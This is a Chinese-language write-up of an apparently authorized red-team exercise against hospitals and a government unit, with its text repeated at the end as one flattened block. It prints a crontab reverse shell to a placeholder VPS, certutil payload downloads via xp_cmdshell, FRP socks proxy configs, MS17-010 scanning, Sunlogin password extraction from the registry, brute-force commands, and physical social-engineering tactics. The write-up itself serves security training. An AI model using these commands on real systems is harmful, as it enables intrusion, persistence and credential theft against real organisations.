记一次有趣的地市攻防演练经历
字数 1678 2025-08-06 21:48:56

地市攻防演练实战技术总结

0x00 前言

本文详细记录了一次真实地市攻防演练中的技术细节和实战经验,包含外网突破、内网横向移动、社工技巧等多个维度的技术要点。所有目标均已获得授权,内容仅供安全研究学习使用。

0x01 攻击路径与技术细节

某医院外网突破案例

路径1/路径2:外网弱口令突破

  1. C段信息收集:通过目标官网IP收集同C段资产
  2. H3C设备发现:找到H3C网络设备,尝试默认审计账号(admin/admin等)
  3. 权限确认:登陆后查看授权信息确认目标归属
  4. 非标端口扫描:全端口扫描发现非标准SSH端口(如2222等)
  5. SSH弱口令利用:常见弱口令组合尝试(root/root, admin/admin@123等)
  6. 持久化控制:通过crontab设置反弹shell 
    crontab -e
bash -c 'exec bash -i &>/dev/tcp/[VPS_IP]/[PORT] <&1'

内网横向技术

  1. 快速扫描工具:使用fscan扫描内网 
    ./fscan -h 10.0.0.0/8
  2. 代理搭建:使用FRP建立Socks5代理 
    # frps.ini
[common]
bind_port = 8945

# frpc.ini
[common]
server_addr = [VPS_IP]
server_port = 8945
tls_enable = true
pool_count = 5

[plugin_socks]
type = tcp
remote_port = 35145
plugin = socks5
plugin_user = admin
plugin_passwd = Admin@123
use_encryption = true
use_compression = true
  3. 代理验证:使用Proxifier测试代理连通性

路径3:MSSQL服务器利用

  1. xp_cmdshell启用
    EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
  2. 命令执行
    exec master..xp_cmdshell "whoami"
  3. 文件下载
    exec master..xp_cmdshell "certutil -urlcache -split -f http://[VPS_IP]/shell.exe C:\\Windows\\Temp\\shell.exe"

路径4:权限提升与信息收集

  1. Everything高级搜索
    • 关键词:密码|信息科|资产表|拓扑|账号|设备|pass|user|config|管理|规划
    • 正则表达式搜索提高效率
  2. 社工密码生成:使用CPassword工具 
    # 修改username.txt和dict.txt后运行
python3 createDict.py
  3. 批量爆破
    kscan.exe -t 10.0.0.0/8 --hydra --hydra-pass file:pwd.txt

路径5:火绒控制台利用

  1. 浏览器密码提取:从Firefox等浏览器获取保存的密码
  2. 文件分发功能:通过火绒控制台分发并自动执行payload

某综合医院社工案例

路径1:WIFI突破

  1. WIFI万能钥匙:获取附近WIFI密码
  2. 二维码扫描:获取访客网络认证信息
  3. 网络设备登录:尝试H3C默认凭证

路径2:向日葵RCE利用

  1. 漏洞利用:向日葵远程代码执行漏洞
  2. 备用方案:安装ToDesk等替代远程工具

路径3:靶机控制

  1. 内网扫描:通过跳板机扫描内网段
  2. 远程工具利用:利用发现的ToDesk保存的连接直接控制靶机

某专科医院近源攻击

路径1:WIFI接入

  1. 社工技巧:伪装就诊人员进入医院
  2. Kali Nethunter:使用手机版Kali进行渗透

路径2:MS17-010利用

  1. 漏洞检测
    msfconsole
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 10.0.0.0/8
run
  2. 向日葵密码提取
    # 注册表查询
reg query HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginInfo
reg query HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginGreenInfo
  3. 密码解密:使用Sunflower_get_Password工具解密

某ZF单位VPN突破

  1. L2TP VPN搭建:通过获取的网络设备权限搭建VPN隧道
  2. NAT映射利用:通过Telnet测试内网脆弱端口映射

0x02 工具与技术总结

外网打点工具链

  1. 资产收集
    • ENScan_GO
    • Kunyu/Fofa_viewer/infoSearchAll
  2. 空间测绘
    • Fofa/360Quake/Shadow/ZoomEye/Hunter
  3. 轻量扫描器
    • kscan(服务识别)
    • fscan(C段快速识别)
  4. 子域名收集
    • OneForAll/Subfinder/ksubdomain
  5. Web指纹识别
    • EHole(可二次开发)
    • TideFinger
    • httpx(获取网页基础信息)

内网渗透要点

  1. 信息收集
    • Everything文件搜索(正则表达式)
    • 浏览器/微信/QQ保存的密码
    • 回收站/共享盘/邮件/协同软件
    • 远程软件保存的连接信息
  2. 常见漏洞
    • 向日葵RCE
    • Weblogic漏洞
    • Struts2漏洞
    • Redis未授权
    • Shiro反序列化

0x03 经验总结

  1. 密码规律分析:注意收集到的密码中的时间戳(@2022)、特殊字符组合(!@#123)等模式
  2. 多持久化通道:建立多个反弹shell防止单点失效
  3. 应急方案准备:如电脑故障时的替代方案(文中使用销售电脑)
  4. 规则理解:充分理解攻防演练评分规则,针对性拿分
  5. 社工技巧:合理伪装身份获取物理接入权限

0x04 参考资源

  1. MS-SQL利用指南
  2. Everything高级用法
  3. CPassword工具
  4. 向日葵密码解密
  5. H3C VPN配置

注:本文所有技术内容仅限授权测试使用,未经授权进行测试属于违法行为。

地市攻防演练实战技术总结 0x00 前言 本文详细记录了一次真实地市攻防演练中的技术细节和实战经验,包含外网突破、内网横向移动、社工技巧等多个维度的技术要点。所有目标均已获得授权,内容仅供安全研究学习使用。 0x01 攻击路径与技术细节 某医院外网突破案例 路径1/路径2:外网弱口令突破 C段信息收集 :通过目标官网IP收集同C段资产 H3C设备发现 :找到H3C网络设备,尝试默认审计账号(admin/admin等) 权限确认 :登陆后查看授权信息确认目标归属 非标端口扫描 :全端口扫描发现非标准SSH端口(如2222等) SSH弱口令利用 :常见弱口令组合尝试(root/root, admin/admin@123等) 持久化控制 :通过crontab设置反弹shell 内网横向技术 快速扫描工具 :使用fscan扫描内网 代理搭建 :使用FRP建立Socks5代理 代理验证 :使用Proxifier测试代理连通性 路径3:MSSQL服务器利用 xp_ cmdshell启用 : 命令执行 : 文件下载 : 路径4:权限提升与信息收集 Everything高级搜索 : 关键词: 密码|信息科|资产表|拓扑|账号|设备|pass|user|config|管理|规划 正则表达式搜索提高效率 社工密码生成 :使用CPassword工具 批量爆破 : 路径5:火绒控制台利用 浏览器密码提取 :从Firefox等浏览器获取保存的密码 文件分发功能 :通过火绒控制台分发并自动执行payload 某综合医院社工案例 路径1:WIFI突破 WIFI万能钥匙 :获取附近WIFI密码 二维码扫描 :获取访客网络认证信息 网络设备登录 :尝试H3C默认凭证 路径2:向日葵RCE利用 漏洞利用 :向日葵远程代码执行漏洞 备用方案 :安装ToDesk等替代远程工具 路径3:靶机控制 内网扫描 :通过跳板机扫描内网段 远程工具利用 :利用发现的ToDesk保存的连接直接控制靶机 某专科医院近源攻击 路径1:WIFI接入 社工技巧 :伪装就诊人员进入医院 Kali Nethunter :使用手机版Kali进行渗透 路径2:MS17-010利用 漏洞检测 : 向日葵密码提取 : 密码解密 :使用Sunflower_ get_ Password工具解密 某ZF单位VPN突破 L2TP VPN搭建 :通过获取的网络设备权限搭建VPN隧道 NAT映射利用 :通过Telnet测试内网脆弱端口映射 0x02 工具与技术总结 外网打点工具链 资产收集 : ENScan_ GO Kunyu/Fofa_ viewer/infoSearchAll 空间测绘 : Fofa/360Quake/Shadow/ZoomEye/Hunter 轻量扫描器 : kscan(服务识别) fscan(C段快速识别) 子域名收集 : OneForAll/Subfinder/ksubdomain Web指纹识别 : EHole(可二次开发) TideFinger httpx(获取网页基础信息) 内网渗透要点 信息收集 : Everything文件搜索(正则表达式) 浏览器/微信/QQ保存的密码 回收站/共享盘/邮件/协同软件 远程软件保存的连接信息 常见漏洞 : 向日葵RCE Weblogic漏洞 Struts2漏洞 Redis未授权 Shiro反序列化 0x03 经验总结 密码规律分析 :注意收集到的密码中的时间戳(@2022)、特殊字符组合( !@#123)等模式 多持久化通道 :建立多个反弹shell防止单点失效 应急方案准备 :如电脑故障时的替代方案(文中使用销售电脑) 规则理解 :充分理解攻防演练评分规则,针对性拿分 社工技巧 :合理伪装身份获取物理接入权限 0x04 参考资源 MS-SQL利用指南 Everything高级用法 CPassword工具 向日葵密码解密 H3C VPN配置 注:本文所有技术内容仅限授权测试使用,未经授权进行测试属于违法行为。